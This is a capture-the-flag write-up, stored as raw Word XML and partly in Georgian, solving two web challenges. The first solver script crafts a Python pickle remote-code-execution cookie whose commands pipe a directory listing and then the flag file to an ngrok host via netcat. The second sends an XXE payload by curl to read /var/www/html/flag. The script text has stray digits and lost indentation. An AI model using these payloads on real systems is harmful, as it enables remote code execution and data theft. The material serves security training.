      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ს’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E49A83B" w14:textId="17887D13" w:rsidR="00705768" w:rsidRDefault="00705768" w:rsidP="00080E3F">
      <w:r>
        <w:t>xor(_, key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401EDA5C" w14:textId="25EA52BF" w:rsidR="00705768" w:rsidRDefault="00705768" w:rsidP="00080E3F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00705768">
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29752EB2" wp14:editId="033603F3">
            <wp:extent cx="5943600" cy="884555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7752312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31207" name="Picture 1" descr="A black screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="884555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D20E97" w14:textId="3E814F59" w:rsidR="00705768" w:rsidRDefault="001F3C2A" w:rsidP="001F3C2A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3C2A">
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>The last string contains several readable words and is, in fact, a serialized object using the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3C2A">
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>pickle library:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548AC9E5" w14:textId="274DC6D5" w:rsidR="001F3C2A" w:rsidRDefault="001F3C2A" w:rsidP="001F3C2A">
      <w:r>
        <w:t>import pickle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F27A3F" w14:textId="717DFD5F" w:rsidR="001F3C2A" w:rsidRDefault="001F3C2A" w:rsidP="001F3C2A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>pickle.loads(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>აქ ჩავწერთ ზემოთ მიღებულ სტრინგს)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620E4AC6" w14:textId="220247AD" w:rsidR="001F3C2A" w:rsidRPr="00080E3F" w:rsidRDefault="001F3C2A" w:rsidP="001F3C2A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3C2A">
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C8487F2" wp14:editId="1F7FB191">
            <wp:extent cx="5943600" cy="1209675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="895194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4187" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1209675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63435E5B" w14:textId="0C048A5B" w:rsidR="00080E3F" w:rsidRDefault="00F32E97" w:rsidP="00080E3F">
      <w:r>
        <w:t>Then we close cmd and open new one and type:</w:t>
      </w:r>
      <w:r w:rsidR="001F3C2A">
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F3C2A">
        <w:t>ngrok tcp 6666</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBC3415" w14:textId="636DC228" w:rsidR="001F3C2A" w:rsidRDefault="001F3C2A" w:rsidP="00080E3F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C980146" wp14:editId="4006E436">
            <wp:extent cx="5963285" cy="2496185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47417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3285" cy="2496185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E6B5F7" w14:textId="740FF8B1" w:rsidR="001F3C2A" w:rsidRDefault="00A97813" w:rsidP="00080E3F">
      <w:r>
        <w:t>Then we set netcat: nc -lvnp 6666</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B05CE8F" w14:textId="77777777" w:rsidR="00F32E97" w:rsidRDefault="00A97813" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00A97813">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DC7A3CA" wp14:editId="2EE35C24">
            <wp:extent cx="4867954" cy="857370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="566872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215" name="Picture 1" descr="A black screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4867954" cy="857370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C9CA31" w14:textId="2B54B2A5" w:rsidR="00BD677E" w:rsidRDefault="00F32E97" w:rsidP="00080E3F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We don’t close this cmd. W</w:t>
      </w:r>
      <w:r w:rsidR="00BD677E">
        <w:t>e open notepad, write this code and save this note with the name solver.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321226A3" w14:textId="77777777" w:rsidR="00BD677E" w:rsidRDefault="00BD677E" w:rsidP="00BD677E">
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D61064A" w14:textId="77777777" w:rsidR="00BD677E" w:rsidRDefault="00BD677E" w:rsidP="00BD677E">
      <w:r>
        <w:t>import pickle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3B453D" w14:textId="77777777" w:rsidR="00BD677E" w:rsidRDefault="00BD677E" w:rsidP="00BD677E">
      <w:r>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DBEE7C" w14:textId="77777777" w:rsidR="00BD677E" w:rsidRDefault="00BD677E" w:rsidP="00BD677E">
      <w:r>
        <w:t>url = "http://35.198.93.134:30049/dashboard"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A58BCCD" w14:textId="77777777" w:rsidR="00BD677E" w:rsidRDefault="00BD677E" w:rsidP="00BD677E">
      <w:r>
        <w:t>class RCE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594FCF53" w14:textId="77777777" w:rsidR="00BD677E" w:rsidRDefault="00BD677E" w:rsidP="00BD677E">
      <w:r>
        <w:t>def __reduce__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D18E99" w14:textId="77777777" w:rsidR="00BD677E" w:rsidRDefault="00BD677E" w:rsidP="00BD677E">
      <w:r>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33586F8E" w14:textId="77777777" w:rsidR="00BD677E" w:rsidRDefault="00BD677E" w:rsidP="00BD677E">
      <w:r>
        <w:t>cmd = ('ls -lah | nc 2.tcp.ngrok.io 17855')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BC6A9C" w14:textId="77777777" w:rsidR="00BD677E" w:rsidRDefault="00BD677E" w:rsidP="00BD677E">
      <w:r>
        <w:t>return os.system, (cmd,)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7152BC35" w14:textId="77777777" w:rsidR="00BD677E" w:rsidRDefault="00BD677E" w:rsidP="00BD677E">
      <w:r>
        <w:t>payload = pickle.dumps(RCE(), protocol=2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0B3FC8" w14:textId="77777777" w:rsidR="00BD677E" w:rsidRDefault="00BD677E" w:rsidP="00BD677E">
      <w:r>
        <w:t>print(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609A9F51" w14:textId="77777777" w:rsidR="00BD677E" w:rsidRDefault="00BD677E" w:rsidP="00BD677E">
      <w:r>
        <w:t>key = len(payload) * "A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DEC117" w14:textId="77777777" w:rsidR="00BD677E" w:rsidRDefault="00BD677E" w:rsidP="00BD677E">
      <w:r>
        <w:t>auth_cookie = xor(payload, key).hex()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372407BE" w14:textId="4AA260F4" w:rsidR="00BD677E" w:rsidRDefault="00BD677E" w:rsidP="00BD677E">
      <w:r>
        <w:t>r = requests.get(url, cookies={"key": key, "auth_cookie": auth_cookie})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666A74E1" w14:textId="77777777" w:rsidR="00F32E97" w:rsidRDefault="00F32E97" w:rsidP="00BD677E"/>
    <w:p w14:paraId="418E2093" w14:textId="3DAE6410" w:rsidR="00F32E97" w:rsidRPr="00080E3F" w:rsidRDefault="00F32E97" w:rsidP="00BD677E">
      <w:r>
        <w:t>Then we open new cmd not closing the old one and write: python3 solver.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5E3989" w14:textId="36C039D9" w:rsidR="00303479" w:rsidRDefault="00F32E97" w:rsidP="001A4EE7">
      <w:r w:rsidRPr="00F32E97">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07781313" wp14:editId="3FBFD72B">
            <wp:extent cx="5943600" cy="257175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="55567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1794" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="257175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA4E105" w14:textId="072D4466" w:rsidR="00F32E97" w:rsidRDefault="004F0203" w:rsidP="001A4EE7">
      <w:r>
        <w:t>Now we go back to previous cmd and check netcat session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65162737" w14:textId="2950321B" w:rsidR="004F0203" w:rsidRDefault="004F0203" w:rsidP="001A4EE7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="028F9B86" wp14:editId="53456C15">
            <wp:extent cx="5420360" cy="2448560"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
            <wp:docPr id="1940229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0360" cy="2448560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD8FB99" w14:textId="1503501A" w:rsidR="004F0203" w:rsidRDefault="004F0203" w:rsidP="001A4EE7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now we need to update the solver.py to get flag. We delete previous code and write:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01862FDC" w14:textId="77777777" w:rsidR="004F0203" w:rsidRDefault="004F0203" w:rsidP="004F0203">
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E6AB5E" w14:textId="77777777" w:rsidR="004F0203" w:rsidRDefault="004F0203" w:rsidP="004F0203">
      <w:r>
        <w:t>import pickle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13490194" w14:textId="77777777" w:rsidR="004F0203" w:rsidRDefault="004F0203" w:rsidP="004F0203">
      <w:r>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CE543B" w14:textId="77777777" w:rsidR="004F0203" w:rsidRDefault="004F0203" w:rsidP="004F0203">
      <w:r>
        <w:t>url = "http://35.198.93.134:30049/dashboard"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70824C3C" w14:textId="77777777" w:rsidR="004F0203" w:rsidRDefault="004F0203" w:rsidP="004F0203">
      <w:r>
        <w:t>class RCE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B39880" w14:textId="77777777" w:rsidR="004F0203" w:rsidRDefault="004F0203" w:rsidP="004F0203">
      <w:r>
        <w:t>def __reduce__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EE4655" w14:textId="77777777" w:rsidR="004F0203" w:rsidRDefault="004F0203" w:rsidP="004F0203">
      <w:r>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0D10EE" w14:textId="77777777" w:rsidR="004F0203" w:rsidRDefault="004F0203" w:rsidP="004F0203">
      <w:r>
        <w:t>cmd = ('cat flag | nc 2.tcp.ngrok.io 17855')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594F6396" w14:textId="77777777" w:rsidR="004F0203" w:rsidRDefault="004F0203" w:rsidP="004F0203">
      <w:r>
        <w:t>return os.system, (cmd,)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AC4543" w14:textId="77777777" w:rsidR="004F0203" w:rsidRDefault="004F0203" w:rsidP="004F0203">
      <w:r>
        <w:t>payload = pickle.dumps(RCE(), protocol=2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE9F807" w14:textId="77777777" w:rsidR="004F0203" w:rsidRDefault="004F0203" w:rsidP="004F0203">
      <w:r>
        <w:t>print(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DCF278" w14:textId="77777777" w:rsidR="004F0203" w:rsidRDefault="004F0203" w:rsidP="004F0203">
      <w:r>
        <w:t>key = len(payload) * "A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254EBBD7" w14:textId="77777777" w:rsidR="004F0203" w:rsidRDefault="004F0203" w:rsidP="004F0203">
      <w:r>
        <w:t>auth_cookie = xor(payload, key).hex()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3FAB91" w14:textId="5888DD34" w:rsidR="004F0203" w:rsidRDefault="004F0203" w:rsidP="004F0203">
      <w:r>
        <w:t>r = requests.get(url, cookies={"key": key, "auth_cookie": auth_cookie})</w:t>
      </w:r>
      <w:r>
        <w:cr/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7473A708" w14:textId="466CF7D0" w:rsidR="004F0203" w:rsidRDefault="00922440" w:rsidP="004F0203">
      <w:r>
        <w:t>Then we again type: python3 solver.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A77947" w14:textId="1F635FD4" w:rsidR="00922440" w:rsidRDefault="00922440" w:rsidP="004F0203">
      <w:r w:rsidRPr="00922440">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4260011C" wp14:editId="5EBF6B3D">
            <wp:extent cx="5943600" cy="397510"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="71112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1811" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="397510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43134322" w14:textId="12D658EA" w:rsidR="00922440" w:rsidRDefault="00922440" w:rsidP="004F0203">
      <w:r>
        <w:t>We again check the netcat session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B4E8A2" w14:textId="16EC3A03" w:rsidR="00922440" w:rsidRDefault="00922440" w:rsidP="004F0203">
      <w:r w:rsidRPr="00922440">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F7A3CAF" wp14:editId="2D538343">
            <wp:extent cx="5943600" cy="827405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="399984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400" name="Picture 1" descr="A black background with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="827405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54265E24" w14:textId="2BFA1334" w:rsidR="00922440" w:rsidRDefault="00922440" w:rsidP="004F0203">
      <w:r>
        <w:t>Here we see the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBCB7EC" w14:textId="75F6462B" w:rsidR="00932B78" w:rsidRDefault="00932B78" w:rsidP="00932B78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Syntax-check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCE8D43" w14:textId="21E802DA" w:rsidR="00932B78" w:rsidRDefault="00932B78" w:rsidP="00932B78">
      <w:pPr>
        <w:ind w:left="45"/>
      </w:pPr>
      <w:r w:rsidRPr="00932B78">
        <w:t>When we access the SYNTAX-CHECK challenge, we'll be given a Parse button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9DC01F" w14:textId="3CA9CA25" w:rsidR="00932B78" w:rsidRDefault="00932B78" w:rsidP="00932B78">
      <w:pPr>
        <w:ind w:left="45"/>
      </w:pPr>
      <w:r w:rsidRPr="00932B78">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58BCCBA0" wp14:editId="5411C408">
            <wp:extent cx="5943600" cy="737235"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="7542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829" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="737235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD83AE3" w14:textId="56D713A9" w:rsidR="00932B78" w:rsidRDefault="00C155E6" w:rsidP="00C155E6">
      <w:pPr>
        <w:ind w:left="45"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Click the Parse button to go. The page displays the message "Empty string provided as input.".</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>We realized through parameters and errors that the “input” of the error means “php://input”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493EDFAE" w14:textId="50CF0AB6" w:rsidR="00C155E6" w:rsidRDefault="00C155E6" w:rsidP="00C155E6">
      <w:pPr>
        <w:ind w:left="45"/>
      </w:pPr>
      <w:r w:rsidRPr="00C155E6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31DABD76" wp14:editId="7B63C093">
            <wp:extent cx="5943600" cy="560070"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="182342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23957" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="560070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3176B961" w14:textId="1F176AA3" w:rsidR="00F60D74" w:rsidRDefault="00F60D74" w:rsidP="00C155E6">
      <w:pPr>
        <w:ind w:left="45"/>
      </w:pPr>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60D74">
        <w:t>e know where the flag is, it is in /var/www/html/flag, We can get that file with help of xml.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> We write in the cmd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433C06A6" w14:textId="2FFB3969" w:rsidR="00F60D74" w:rsidRDefault="00F60D74" w:rsidP="00C155E6">
      <w:pPr>
        <w:ind w:left="45"/>
      </w:pPr>
      <w:r>
        <w:t>curl -X ‘GET’ –data-binary ‘&lt;?xml version=”1.0” encoding=”ISO-8859-1”?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD721A6" w14:textId="77777777" w:rsidR="00F60D74" w:rsidRDefault="00F60D74" w:rsidP="00F60D74">
      <w:pPr>
        <w:ind w:left="45"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6732CDB2" w14:textId="77777777" w:rsidR="00F60D74" w:rsidRDefault="00F60D74" w:rsidP="00F60D74">
      <w:pPr>
        <w:ind w:left="45"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;!ELEMENT foo ANY&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0979045C" w14:textId="3B1A9D38" w:rsidR="00F60D74" w:rsidRDefault="00F60D74" w:rsidP="00F60D74">
      <w:pPr>
        <w:ind w:left="45"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;!ENTITY xxe SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"php://filter/convert.base64-encode/resource=/var/www/html/flag"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A8F0FA" w14:textId="77777777" w:rsidR="00F60D74" w:rsidRDefault="00F60D74" w:rsidP="00F60D74">
      <w:pPr>
        <w:ind w:left="45"/>
      </w:pPr>
      <w:r>
        <w:t>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26315919" w14:textId="77777777" w:rsidR="00F60D74" w:rsidRDefault="00F60D74" w:rsidP="00F60D74">
      <w:pPr>
        <w:ind w:left="45"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E33E95A" w14:textId="77777777" w:rsidR="00F60D74" w:rsidRDefault="00F60D74" w:rsidP="00F60D74">
      <w:pPr>
        <w:ind w:left="45"/>
      </w:pPr>
      <w:r>
        <w:t>&amp;xxe;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F43E001" w14:textId="2A9848C7" w:rsidR="00F60D74" w:rsidRDefault="00F60D74" w:rsidP="00F60D74">
      <w:pPr>
        <w:ind w:left="45"/>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>&lt;/foo&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>აქ ვწერთ ზემოთა ლინკს</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62663577" w14:textId="61F458DD" w:rsidR="00F60D74" w:rsidRDefault="00F60D74" w:rsidP="00F60D74">
      <w:pPr>
        <w:ind w:left="45"/>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F60D74">
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7601F358" wp14:editId="5ED0CF94">
            <wp:extent cx="5943600" cy="3488690"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1468489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89953" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3488690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DA9962" w14:textId="19FA64E5" w:rsidR="00F60D74" w:rsidRDefault="008C0857" w:rsidP="00F60D74">
      <w:pPr>
        <w:ind w:left="45"/>
      </w:pPr>
      <w:r>
        <w:t>This is our flag, we just have to convert base64 to utf-8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565E85D7" w14:textId="3DA37A9E" w:rsidR="008C0857" w:rsidRDefault="008C0857" w:rsidP="00F60D74">
      <w:pPr>
        <w:ind w:left="45"/>
      </w:pPr>
      <w:r w:rsidRPr="008C0857">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43A3DDF5" wp14:editId="65354035">
            <wp:extent cx="5943600" cy="2731135"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32435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0737" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2731135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
